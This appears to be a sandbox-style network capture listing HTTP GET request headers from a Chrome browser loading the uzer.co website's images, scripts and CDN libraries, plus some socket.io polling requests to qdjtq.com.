Source: global trafficHTTP traffic detected: GET /aos@2.3.1/dist/aos.css HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/ico-procesos-02.svg HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8munRy&sid=jnmURHTecJrkHRFxAHuG HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/imagen-home-2024.webp HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mum-H&sid=jnmURHTecJrkHRFxAHuG HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mum-M&sid=jnmURHTecJrkHRFxAHuG HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /popper.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/twitter-bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/ico-procesos-01.svg HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/ico-procesos-03.svg HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/uzer-heading-bg-2024.jpg HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/clutch-logo.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/uzer-logo.svg HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/css/expandable.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/award-decoration.svg HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port3.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /popper.js@1.16.1 HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port5.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port6.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /OwlCarousel2/assets/owlcarousel/owl.carousel.js HTTP/1.1Host: owlcarousel2.github.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port1.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port2.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port4.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /popper.js@1.16.1/dist/umd/popper.min.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/ico-procesos-02.svg HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/imagen-home-2024.webp HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/ico-procesos-01.svg HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/ico-procesos-03.svg HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port7.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/wp_icon.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/uzer-heading-bg-2024.jpg HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/ico-procesos-04.svg HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/uzer-logo.svg HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/twitter-bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/main.js HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aos@2.3.1/dist/aos.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /popper.js@1.16.1/dist/umd/popper.min.js HTTP/1.1Host: unpkg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/award-decoration.svg HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/clutch-logo.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port5.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port1.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/velocity.min.js HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port2.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/expandable.js HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muoqp HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/Sly/1.6.1/sly.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aos@2.3.1/dist/aos.js HTTP/1.1Host: unpkg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/modernizr.js HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port3.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/forms.js HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
